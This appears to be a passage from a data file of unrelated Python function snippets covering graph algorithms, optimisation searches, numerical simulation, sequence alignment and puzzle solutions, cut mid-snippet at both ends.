x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #unstable coexistence nor exclusion\n fate[4]+=1\n res=4\n print(Td, x1d, x2d)\n else:\n #sCo vs rCh\n # in this case two equilibria can be stable at the same time\n [tau_p,tau_m]=Quad(case,alpha,cd,cr,Ks, Kr, 
n)\n if tau_m>Ts**n or tau_p<Ts**n:\n # cexclusion is stable\n stab_e=1\n # stability in coexistence \n if tau_p<0:\n stab_c=0\n else:\n Td=tau_p**(1/n)\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n stab_c=1\n #classify\n if stab_e==1 and stab_c==1:\n # two stable equilbria\n fate[5]+=1\n res=5\n elif stab_e==1 and stab_c==0:\n #only stable cexclusion\n fate[2]+=1\n res=2\n elif stab_e==0 and stab_c==1:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #both unstable\n fate[4]+=1\n res=4\n \n #save the results\n if counter==0:\n result=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n #save the result with parameter values\n \n else:\n #add array of results\n R=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n result=np.concatenate((result, R), axis=0)\n counter+=1\n \n #save csv file and graph\n np.savetxt(fname+'.csv',result, delimiter=',', header='Ks, Kr, cr, cd, alpha, T0, class', fmt='%.6f') \n print(fate)\n fate_matrix[tri,:]=fate \n if case==0: \n np.savetxt('parameter_sweep_MC_total_case0.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4', fmt='%d')\n else:\n np.savetxt('parameter_sweep_MC_total_case1.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4,cl5', fmt='%d')\n Plot(case)", "def q2(array):\n a = array[2]\n b = array[7]\n c = array[8]\n d = array[13]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], a1, array[3], array[4], array[5], array[6], b1, c1, array[9], array[10], array[11], \\\n array[\n 12], d1, array[14], array[15]", "def SA(targetMDG):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, i)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n 
print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n return max_climber.result", "def kosaraju(graph):\n\n def reverse_edges(graph):\n \"\"\"Reverse the edges of a graph in place.\n\n Args:\n graph (defaultdict(list)): An adjacency list representation\n of a directed graph\n Returns:\n None (graph is modified in-place)\n \"\"\"\n # Add None to the end of each list of edges to act as sentinel value\n for node in graph:\n graph[node].append(None)\n # Add each new edge after the None sentinel\n new_key_values = defaultdict(lambda: list([None]))\n for node, edge_heads in graph.items():\n for head in edge_heads:\n if head is None:\n break\n if head in graph:\n graph[head].append(node)\n else:\n # Don't add new keys to dict while iterating over it\n new_key_values[head].append(node)\n # Add any new key-values to original adjacency list\n graph.update(new_key_values)\n # Remove all edges before the None sentinel, as well as the sentinel\n for node, edge_heads in graph.items():\n graph[node] = edge_heads[edge_heads.index(None)+1:]\n\n def dfs_loop(graph, ordered_nodes):\n\n def dfs_inorder_iter(graph, start_node):\n \"\"\"Do iterative traversal of graph\n\n Important wrinkle: Calculates finishing times\n as though traversal by simple recursive DFS algorithm\n (child node visited before parent node)\n \"\"\"\n nonlocal t\n\n if visited[start_node]:\n return\n\n seen_once = {}\n nodes_seen = 0\n stack = [start_node]\n nodes_in_stack = set(stack)\n\n while stack:\n node = stack.pop()\n nodes_in_stack.remove(node)\n if not seen_once.get(node):\n # It's our first time visiting the node,\n # so put it back on the stack; we won't take\n # it off permanently until we're backtracking\n stack.append(node)\n nodes_in_stack.add(node)\n seen_once[node] = True\n for neighbor_node in graph[node]:\n if (not visited[neighbor_node]\n and not seen_once.get(neighbor_node)\n and neighbor_node not in nodes_in_stack):\n stack.append(neighbor_node)\n nodes_in_stack.add(neighbor_node)\n else:\n # We're backtracking\n visited[node] = True\n finishing_times[t] = node\n t += 1\n sccs[s] += 1\n\n n = len(graph)\n finishing_times = [None for _ in range(n)]\n visited = {node: False for node in graph}\n sccs = Counter()\n\n t = 0 # Finishing time\n s = None # Leader node\n for node in ordered_nodes:\n if not visited[node]:\n s = node\n dfs_inorder_iter(graph, node)\n return finishing_times, sccs\n\n reverse_edges(graph)\n finishing_times, disregard = dfs_loop(graph, list(graph))\n reverse_edges(graph)\n disregard, sccs = dfs_loop(graph, reversed(finishing_times))\n return [count for leader, count in sccs.most_common(5)]", "def solve(n, x, blows):\n # max_dh = max(d - h for d, h in blows)\n\n r = float('inf')\n dh = []\n maxd = max(blows)[0]\n for d, h in blows:\n if d >= x:\n return 1\n elif d <= h:\n continue\n dh.append((d - h, d, h))\n v = int(math.ceil((x - maxd) / (d - h))) + 1\n r = min(r, v)\n if not dh:\n return -1\n return r", "def _build_cumulative_downhill_matrices(self):\n\n import time\n from scipy import sparse as sparse\n\n downSweepMat = self.accumulatorMat.copy() \n downHillaccuMat = self.downhillMat.copy() \n accuM = self.downhillMat.copy() # work matrix\n\n DX = np.ones(self.tri.npoints) # measure when all the info has been propagated out.\n\n walltime = time.clock()\n\n while np.any(DX):\n downSweepMat = downSweepMat.dot(self.accumulatorMat) # N applications of the accumulator\n accuM = 
accuM.dot(self.downhillMat)\n downHillaccuMat = downHillaccuMat + accuM \n \n DX = self.downhillMat.dot(DX) \n \n \n print \" - Dense downhill matrix storage time \", time.clock() - walltime\n\n downHillaccuMat = downHillaccuMat + sparse.identity(self.tri.npoints, format='csr')\n\n self.downhillCumulativeMat = downHillaccuMat\n self.sweepDownToOutflowMat = downSweepMat\n\n # print \"Terminated in \",it,\" iterations\"\n\n return", "def hr_game(t0, tf, n, A, B, R, x0):\n # t0 - Initial time\n # tf - Final time\n # n - Number of steps\n # A - Adjacency matrix, np.ndarray (N,N)\n # B - A 2D or 3D matrix with all payoff matrices, np.ndarray (S,S,N)\n # R - Relationship or preference matrix, np.ndarray (N,N)\n # x0 - Initial state of our system, np.ndarray (N,S), must be double\n\n # Number of players\n N = A[:, 0].size\n # Number of strategies\n S = x0[0, :].size\n # Step in each iteration\n h = (tf - t0) / n\n # Result of each step, np.ndarray (N, S, n+1)\n y = np.zeros([N, S, n+1], dtype='double')\n y[:, :, 0] = x0\n k = np.zeros([N, S])\n # I still don't know why, but theres a problem with negative payoffs\n B = matrixTranslate(B)\n\n # Fourth order Runge-Kutta\n for t in range(n):\n k1 = np.multiply(h, hr_egn(A, B, R, y[:, :, t]))\n k2 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], np.divide(k1, 2))))\n k3 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], np.divide(k2, 2))))\n k4 = np.multiply(h, hr_egn(A, B, R, np.add(y[:, :, t], k3)))\n # k = (k1 + 2*k2 + 2*k3 + k4)/6\n k = np.divide(np.add(np.add(k1, np.multiply(2, k2)), np.add(np.multiply(2, k3), k4)), 6)\n\n y[:, :, t+1] = np.add(y[:, :, t], k)\n\n # Filter results with machine epsilon\n for v in range(N):\n for s in range(S):\n if y[v, s, t+1] < np.sqrt(np.finfo('double').eps):\n y[v, s, t+1] = 0\n elif y[v, s, t+1] > np.subtract(1, np.sqrt(np.finfo('double').eps)):\n y[v, s, t + 1] = 1\n\n return y", "def answer():\n for k in range(2,3000):\n for j in range(k-1,0,-1):\n pj, pk = P(j), P(k)\n #print( j, k, pj, pk )\n if isPent(pk-pj):\n #print( j, k, pj, pk, pk+pj, isPent(pk+pj), pk-pj )\n if isPent(pk+pj) and isPent(pk-pj):\n return pk-pj", "def q8(array):\n a = array[0]\n b = array[4]\n c = array[8]\n d = array[12]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return a1, array[1], array[2], array[3], b1, array[5], array[6], array[7], c1, array[9], array[\n 10], array[11], d1, array[13], array[14], array[15]", "def find_harshad(d):\n if d == 1:\n return list(range(1, 10))\n acc = []\n for x in find_harshad(d - 1):\n for a in range(10):\n n = x * 10 + a\n if is_harshad(n):\n acc.append(n)\n return acc", "def q6(array):\n a = array[2]\n b = array[6]\n c = array[10]\n d = array[14]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + 
roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], a1, array[3], array[4], array[5], b1, array[7], array[8], array[9], c1, array[11], array[\n 12], array[13], d1, array[15]", "def solve_bruteforce(self):\n max_value = -1\n for z in range(0, self.k):\n max_value = -1\n max_index = -1\n for i, v in enumerate(self.numbers):\n if v > max_value:\n max_index = i\n max_value = v\n del self.numbers[max_index]\n\n return max_value", "def MINSTD(x):\n \n yield from lehmer(x,48271,2**31-1)", "def iterative_fuel(d):\n accumulator = d\n total = 0\n while True:\n accumulator = math.floor(accumulator / 3) - 2\n if accumulator < 0:\n return total\n total += accumulator", "def _SD_optimal(t):", "def q5(array):\n a = array[3]\n b = array[7]\n c = array[11]\n d = array[15]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], array[2], a1, array[4], array[5], array[6], b1, array[8], array[9], array[10], c1, array[\n 12], array[13], array[14], d1", "def fn(k, i, j):\n if not (0 <= i < N and 0 <= j < N): return 0\n if k == 0: return 1 \n return 1/8*sum(fn(k-1, i+ii, j+jj) for ii, jj in ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)))", "def hillClimbingSearch_RR(problem, p, maxSteps, userInteraction, beQuiet):\n\n import random\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n steps = 0\n restarts=0\n bestYet = currentState\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n\n while steps<maxSteps:\n if problem.isGlobalOptimum(currentState):\n print(f\"\\nTotal random restarts done: {restarts}.\")\n return steps, bestYet\n if random.random()>=p:\n # make a greedy step\n neighbours = problem.getNeighbours(currentState)\n runningBest = currentState\n for n in neighbours:\n nObjVal = problem.getObjValue(n)\n runningBestVal = problem.getObjValue(runningBest)\n if problem.isBetter(nObjVal, runningBestVal):\n runningBest = n\n if runningBest is currentState:\n # no neighbour is better, check against the bestYet\n runningBestVal = problem.getObjValue(runningBest)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(runningBestVal, bestYetVal):\n bestYet = runningBest\n else:\n # jump to best neighbour\n currentState = runningBest\n\n # for visualization later on\n 
problem.hVals.append(problem.getObjValue(currentState))\n \n if not beQuiet:\n print(\"Greedy step taken.\")\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n steps+=1\n else:\n # do a random restart\n currentState = problem.getRandomState()\n \n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Random restart done.\")\n problem.visualize(currentState)\n \n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n \n restarts+=1\n steps+=1\n # after running out of steps, return the best yet state\n print(f\"\\n[INFO] Total number of random restarts done: {restarts}.\")\n return steps, bestYet", "def solution2(inp):\n inp = get_lines(inp)\n notes = inp[1].split(\",\")\n\n offsets = {}\n for i, bus in enumerate(notes):\n if bus == 'x':\n continue\n bus = int(bus)\n offsets[bus] = i\n buses = set(offsets)\n old_buses = buses.copy()\n\n def search(bus, offset, t):\n if (t + offset) % bus == 0:\n buses.remove(bus)\n if len(buses) == 0:\n return True\n new_bus = max(buses)\n return search(new_bus, offsets[new_bus], t)\n return False\n\n cbus = max(buses)\n max_bus = cbus\n s = 100_000_000_000_000\n s = 0\n s = s - s % cbus - offsets[cbus]\n delta = cbus\n stack = buses.copy()\n stack.remove(cbus)\n sec_max = max(stack)\n while not search(max_bus, offsets[max_bus], offsets[max_bus]):\n buses = old_buses.copy()\n s += delta\n if (s + offsets[sec_max]) % sec_max == 0:\n if len(stack) != 0:\n cbus = max(stack)\n stack.remove(cbus)\n if len(stack) != 0:\n sec_max = max(stack)\n else:\n return s\n delta *= cbus\n\n return s - offsets[max(offsets)]", "def am(n):\r\n for i in range(1,n+1):\r\n if i not in d1.keys() :\r\n d1[i] = d1[i-1] + (i*((-1)**i))\r\n# print(d1)\r\n else:\r\n pass\r\n return d1[n]", "def algorithm_loop(self):", "def hillClimbingSearch_S(problem, userInteraction, beQuiet):\n\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n \n steps=0\n while True:\n if problem.isGlobalOptimum(currentState):\n return steps, currentState\n neighbours = problem.getNeighbours(currentState)\n runningBest = currentState\n for n in neighbours:\n nObjVal = problem.getObjValue(n)\n runningBestVal = problem.getObjValue(runningBest)\n if problem.isBetter(nObjVal, runningBestVal):\n runningBest = n\n\n if runningBest is currentState:\n # no neighbour is better, optimum reached\n return steps, currentState\n else:\n # jump to best neighbour\n currentState = runningBest\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n steps+=1\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)", "def levin(x):\n summ = 0\n for t, l in x: # for the time and length of each algorithm\n summ += l + np.log(t)\n return summ", "def one_backward_pass(t,states,init_vals,traces,delta,unit_cube,edges,P):\n \n next_vals = -1e100 * np.ones_like(init_vals)\n \n S,T = states.shape\n \n for i in range(len(states)):\n for j in range(len(unit_cube)):\n# print('State, unitcube subtracted',s,c)\n 
if (states[i] - unit_cube[j]).min() >= 0:\n \n state_idx = edges[i,j]\n \n tau = np.where(unit_cube[j] == 0)\n \n if len(tau[0]) == 0:\n next_vals[state_idx] = log_sum_exp([next_vals[state_idx],\\\n init_vals[i]+T*np.log(delta)])\n \n else:\n flag = 0\n temp = []\n for k in tau[0]:\n if (t-states[i,k] >=0 and t-states[i,k]< len(traces[k])):\n temp.append(traces[k][t-states[i][k]])\n else:\n flag = 1\n break\n\n if (len(set(temp)) == 1 and flag == 0):\n bit = temp[0]\n next_vals[state_idx] = log_sum_exp([next_vals[state_idx],init_vals[i]\\\n + (T-len(temp)) * np.log(delta)\\\n + np.log(1-delta) * (len(temp))\\\n + np.log(P[t,bit] + 1e-100)])\n \n return next_vals", "def main():\r\n for a in alpha:\r\n cmpHash(a)\r\n for l in alpha:\r\n cmpHash(a + l)\r\n for p in alpha:\r\n cmpHash(a + l + p)\r\n for h in alpha:\r\n cmpHash(a + l + p + h)\r\n for al in alpha:\r\n cmpHash(a + l + p + h + al)", "def _hill_diff(self, position):\n if position < 0:\n return 2 * position + 1\n else:\n return (1/math.sqrt(1 + 5 * position ** 2)\n - 5 * position ** 2 * (1 + 5 * position ** 2)**-1.5)", "def misplaced_heuristic(state):\n msp_h = 0\n size = len(state)\n for i in range (size):\n for j in range (size):\n if state[i][j] == 0:\n continue\n elif state[i][j] != i*size + j:\n msp_h += 1\n return msp_h", "def needleman_wunsch(x, y, lodict={}, gop=-2.5, gep=-1.75, local=False, indel=''):\n n, m = len(x), len(y)\n dp = np.zeros((n + 1, m + 1))\n pointers = np.zeros((n + 1, m + 1), np.int32)\n if not local:\n for i1, c1 in enumerate(x):\n if gop is None:\n dp[i1 + 1, 0] = lodict.get((c1, indel), gep)\n else:\n dp[i1 + 1, 0] = dp[i1, 0]+(gep if i1 + 1 > 1 else gop)\n pointers[i1 + 1, 0] = 1\n for i2, c2 in enumerate(y):\n if gop is None:\n dp[0, i2 + 1] = lodict.get((indel, c2), gep)\n else:\n dp[0, i2 + 1] = dp[0, i2]+(gep if i2 + 1 > 1 else gop)\n pointers[0, i2 + 1] = 2\n for i1, c1 in enumerate(x):\n for i2, c2 in enumerate(y):\n match = dp[i1, i2] + lodict.get(\n (c1, c2),\n 1 if c1 == c2 else -1)\n insert = dp[i1, i2 + 1] + (\n lodict.get((c1, indel), gep) if gop is None else\n gep if pointers[i1, i2 + 1] == 1 else gop)\n delet = dp[i1 + 1, i2] + (\n lodict.get((indel, c2), gep) if gop is None else\n gep if pointers[i1 + 1, i2] == 2 else gop)\n pointers[i1 + 1, i2 + 1] = p = np.argmax([match, insert, delet])\n max_score = [match, insert, delet][p]\n if local and max_score < 0:\n max_score = 0\n dp[i1 + 1, i2 + 1] = max_score\n alg = []\n if local:\n i, j = np.unravel_index(dp.argmax(), dp.shape)\n else:\n i, j = n, m\n score = dp[i, j]\n while (i > 0 or j > 0):\n pt = pointers[i, j]\n if pt == 0:\n i -= 1\n j -= 1\n alg = [(x[i], y[j])] + alg\n if pt == 1:\n i -= 1\n alg = [(x[i], indel)] + alg\n if pt == 2:\n j -= 1\n alg = [(indel, y[j])] + alg\n if local and dp[i, j] == 0:\n break\n return score, alg", "def clebsch(idx1, idx2, idx):\n fastcg = clebschSU2\n\n k1, n1, j1, m1 = idx1\n k2, n2, j2, m2 = idx2\n k, n, j, m = idx\n\n if int(2 * j1) not in range(abs(k1 - n1), k1 + n1 + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l1\")\n if int(2 * j2) not in range(abs(k2 - n2), k2 + n2 + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l2\")\n if int(2 * j) not in range(abs(k - n), k + n + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l\")\n if m != m1 + m2:\n return 0\n\n H = sum(\n fastcg((k / 2, mm1 + mm2), (n / 2, m - mm1 - mm2), (j, m))\n * fastcg((k1 / 2, mm1), (k2 / 2, mm2), (k / 2, mm1 + mm2))\n * fastcg((n1 / 2, m1 - mm1), (n2 / 2, m2 
- mm2), (n / 2, m - mm1 - mm2))\n * fastcg((k1 / 2, mm1), (n1 / 2, m1 - mm1), (j1, m1))\n * fastcg((k2 / 2, mm2), (n2 / 2, m2 - mm2), (j2, m2))\n for mm1 in (\n x / 2\n for x in set(range(-k1, k1 + 1, 2)).intersection(\n set(range(int(2 * m1 - n1), int(2 * m1 + n1 + 1), 2))\n )\n )\n for mm2 in (\n x / 2\n for x in set(range(-k2, k2 + 1, 2))\n .intersection(set(range(int(2 * m2 - n2), int(2 * m2 + n2 + 1), 2)))\n .intersection(\n set(range(int(2 * m - n - 2 * mm1), int(2 * m + n - 2 * mm1 + 1), 2))\n )\n .intersection(set(range(int(-k - 2 * mm1), int(k - 2 * mm1 + 1), 2)))\n )\n )\n return H", "def _build_downhill_matrices(self, weight=0.6667):\n\n from scipy import sparse as sparse\n \n\n down_neighbour = np.empty(self.tri.npoints, dtype=np.int)\n\n for node in range (0,self.tri.npoints):\n down_neighbour[node] = self.neighbour_array_lo_hi[node][0]\n\n # Build a matrix of downhill-ness - one entry per node ! \n \n size = self.tri.npoints\n row_array = np.empty(size, dtype = int)\n col_array = np.empty(size, dtype = int)\n down_array = np.ones(size)\n accu_array = np.ones(size)\n\n\n for row in range(0, self.tri.npoints): \n row_array[row] = row\n col_array[row] = down_neighbour[row]\n \n accuMCOO = sparse.coo_matrix( (accu_array, (row_array, col_array)), shape=(size,size) ).T \n\n self.accumulatorMat = accuMCOO.tocsr() \n\n self._build_adjacency_matrix_1()\n self._build_adjacency_matrix_2()\n \n self.downhillMat = weight * self.adjacency1 + (1.0-weight) * self.adjacency2\n\n # A1 = self.downhillMat\n # A2 = self.downhillMat.dot(self.downhillMat)\n # A2a = A1 + A2\n # A4 = A2.dot(A2)\n # A4a = A2a + A2.dot(A2a)\n # A8 = A4.dot(A4)\n # A8a = A4a + A4.dot(A4a)\n # A16 = A8.dot(A8)\n # A16a = A8a + A8.dot(A8a)\n\n # self.downhillMat16 = A16\n # self.downhillMat8 = A8\n # self.downhillMat16a = A16a\n # self.downhillMat8a = A8a\n\n # We make it optional to build these as they are not sparse \n # This cleans up previously stored matrices\n\n self.downhillCumulativeMat = None\n self.sweepDownToOutflowMat = None\n \n return", "def algorithm_h(n, m):\n partition = [1]*m\n partition[0] = n - m + 1\n\n while True:\n yield partition[:]\n if partition[1] < partition[0] - 1:\n partition[0] -= 1\n partition[1] += 1\n else:\n j = 2\n s = partition[0] + partition[1] - 1\n while j < m and partition[j] >= partition[0] - 1:\n s += partition[j]\n j += 1\n if j >= m:\n return\n replacement = partition[j] + 1\n partition[j] = replacement\n j -= 1\n while j > 0:\n partition[j] = replacement\n s -= replacement\n j -= 1\n partition[0] = s", "def q7(array):\n a = array[1]\n b = array[5]\n c = array[9]\n d = array[13]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], a1, array[2], array[3], array[4], b1, array[6], array[7], array[8], c1, array[10], array[11], \\\n array[\n 12], d1, array[14], array[15]", "def alias_setup(probs):\n 
\"\"\"\n Algorithm: Vose's Alias Method\n http://www.keithschwarz.com/darts-dice-coins/\n \"\"\"\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n \n for kk, prob in enumerate(probs):\n q[kk] = K*prob\n if q[kk] < 1.0:\n smaller.append(kk)\n else:\n larger.append(kk)\n \n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n \n J[small] = large\n q[large] = q[large] + q[small] - 1.0\n \n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n \n return J, q", "def _local_improvement(self, folded_design):\n differing_sites = _string_difference_indices(\n self.target.dot_bracket, folded_design\n )\n hamming_distances = []\n for mutation in product(\"AGCU\", repeat=len(differing_sites)):\n mutated = self.design.get_mutated(mutation, differing_sites)\n folded_mutated, _ = fold(mutated.primary)\n hamming_distance = hamming(folded_mutated, self.target.dot_bracket)\n hamming_distances.append(hamming_distance)\n if hamming_distance == 0: # For better timing results\n return 0\n return min(hamming_distances)", "def arbitrary_first_hinge(data):\n n, d = data[0].shape\n max_val = np.zeros((d))\n min_val = np.zeros((d))\n for i in range(d):\n max_val[i] = np.max(data[0][:,i])\n min_val[i] = np.min(data[0][:,i])\n Delta = np.zeros((d))\n no_suitable_hinge = True\n count = 0\n while no_suitable_hinge: # just some number as break criterion\n for i in range(d):\n rand_val = min_val[i]+(max_val[i]-min_val[i])*(2*np.random.rand(1)-1) #to avoid 0 and a value higher then 1 should cause no issue\n if rand_val == 0:\n rand_val = rand_val+0.1*min_val[i]\n Delta[i] = 1/rand_val\n count +=1\n Delta[0] = 0\n data_minus, data_plus = separate_data(data, Delta)\n if (data_minus[1].size > d*2) and (data_plus[1].size > d*2):\n break\n if count > 60:\n print('No initial hinge was found')\n break\n\n return data_plus, data_minus,Delta", "def uninformed_search(start, end, graph):\n\n class SearchNode():\n def __init__(self, step_cost, name, predecessor):\n self.path_cost = predecessor.path_cost + step_cost if predecessor is not None else 0\n self.step_cost = step_cost\n self.name = name\n self.predecessor = predecessor\n def __repr__(self):\n return self.predecessor.name + \"->\" + self.name + \"=\" + self.path_cost\n\n class Problem():\n def __init__(self, start, end, graph, goal_predicate):\n self.start = start\n self.end = end\n self.graph = graph\n self.is_goal = goal_predicate\n self.visited_nodes = []\n\n nodes_expanded = 0\n nodes_generated = 0\n max_nodes_in_memory = 0\n\n def tree_search(problem, fringe):\n nonlocal nodes_generated\n nonlocal nodes_expanded\n nonlocal max_nodes_in_memory\n\n # create the initial node\n nodes_generated = 1\n fringe = [SearchNode(0, problem.start, None)]\n\n while len(fringe) > 0:\n # keep track of some metrics\n max_nodes_in_memory = max(max_nodes_in_memory, len(fringe))\n nodes_expanded += 1\n\n node = fringe.pop(0)\n while node.name in problem.visited_nodes:\n # ran out of nodes in the fringe\n if len(fringe) == 0:\n return None\n\n node = fringe.pop(0)\n\n if problem.is_goal(node):\n return node\n \n # make sure we never visit this node again, since we'll be expanding it\n problem.visited_nodes.append(node.name)\n\n # keep the fringe sorted by the path cost\n fringe.extend(expand(node, problem))\n fringe = sorted(\n fringe, \n key=lambda 